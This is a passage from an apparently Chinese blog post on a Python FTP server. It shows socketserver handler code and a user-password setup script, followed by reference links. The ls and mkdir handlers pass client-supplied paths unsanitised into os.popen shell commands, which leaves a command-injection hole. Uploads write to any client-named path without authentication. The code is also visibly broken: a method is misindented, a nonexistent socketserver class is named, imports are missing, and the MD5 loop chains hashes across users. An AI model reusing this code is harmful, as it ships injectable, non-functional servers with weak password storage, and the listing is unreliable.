    self.request.send(('File %s not deleted!' % filename).encode("utf-8"))
    self.loging('File %s not deleted!' % filename)
  else:
   self.request.send('1'.encode("utf-8"))
   ########################################
 
 def pwd(self,*args):
  '''执行pwd命令'''
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  server_response = os.popen('pwd').read().strip().encode("utf-8")
  self.request.send(server_response)
 
 #############################################
 def ls(self,*args):
  '''执行ls命名'''
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  path = cmd_dic['path']
  cmd = 'ls -l %s' % path
  server_response = os.popen(cmd).read().encode("utf-8")
  self.request.send(server_response)
 
 ############################################
 def put(self,*args):
  '''接收客户端文件'''
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  filename = cmd_dic["filename"]
  filesize = cmd_dic["size"]
  if os.path.isfile(filename):
   f = open(filename + '.new','wb')
  else:
   f = open(filename,'wb')
  request_code = {
   '200': 'Ready to recceive data!','210': 'Not ready to received data!'
  }
  self.request.send('200'.encode())
  receive_size = 0
  while True:
   if receive_size < filesize:
    data = self.request.recv(1024)
    f.write(data)
    receive_size += len(data)
   else:
    data = "File %s has been uploaded successfully!" % filename
    self.loging(data)
    print(data)
    break
 
    ################################################
 
 def mkdir(self,*args):
  request_code = {
   '0': 'Directory has been made!','1': 'Directory is aleady exist!'
  }
  cmd_dic = args[0]
  self.loging(json.dumps(cmd_dic))
  dir_name = cmd_dic['dir_name']
  if os.path.exists(dir_name):
   self.request.send('1'.encode("utf-8"))
  else:
   os.popen('mkdir %s' % dir_name)
   self.request.send('0'.encode("utf-8"))
 
   #############################################
 
  def loging(self,data):
  '''日志记录'''
  localtime = time.asctime(time.localtime(time.time()))
  log_file = '/root/ftp/ftpserver/log/server.log'
  with open(log_file,'a',encoding='utf-8') as f:
   f.write('%s-->' % localtime + data + '\n')
   ##############################################
 
 def handle(self):
  # print("您本次访问使用的IP为:%s" %self.client_address[0])
  # localtime = time.asctime( time.localtime(time.time()))
  # print(localtime)
 
  while True:
   try:
    self.data = self.request.recv(1024).decode() #
    # print(self.data)
    cmd_dic = json.loads(self.data)
    action = cmd_dic["action"]
    # print("用户请求%s"%action)
    if hasattr(self,action):
     func = getattr(self,action)
     func(cmd_dic)
   except Exception as e:
    self.loging(str(e))
    break
 
def run():
 HOST,PORT = '0.0.0.0',6969
 print("The server is started,and listenning at port 6969")
 server = socketserver.ThreadingTcpserver((HOST,PORT),Ftp_server)
 server.serve_forever()
if __name__ == '__main__':
 run()

设置用户口令代码:

#_*_ coding:utf-8 _*_
import os,sys
 
base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
userdb_file = base_dir+"\data\\userdb"
# print(userdb_file)
def userdb_set():
 if os.path.isfile(userdb_file):
  # print(userdb_file)
  return userdb_file
 else:
  print('请先为您的服务器创建用户!')
  user_data = {}
  dict={}
  Exit_flags = True
  while Exit_flags:
   username = input("Please input username:")
   if username != 'exit':
    password = input("Please input passwod:")
    if password != 'exit':
      user_data.update({username:password})
      m = hashlib.md5()
      # m.update('hello')
      # print(m.hexdigest())
      for i in user_data:
       # print(i,user_data[i])
       m.update(user_data[i].encode())
       dict.update({i:m.hexdigest()})
    else:
     break
   else:
    break
  f = open(userdb_file,'w')
  json.dump(dict,f)
  f.close()
 return userdb_file

参考文章:

python的ftplib包介绍:https://docs.python.org/3/library/ftplib.html
https://blog.csdn.net/xc_zhou/article/details/81021414
https://www.jb51.net/article/142388.htm
https://www.jb51.net/article/109429.htm
https://www.cnblogs.com/hltswd/p/6228992.html

 

 

关于笔记整理2——python实现ftp口令爆破python ftp爆破的问题就给大家分享到这里,感谢你花时间阅读本站内容,更多关于msf各种弱口令爆破、python 写的http后台弱口令爆破工具、Python 实现 FTP 弱口令扫描器、python 实现ftp服务 简介等相关知识的信息别忘了在本站进行查找喔。

本文标签: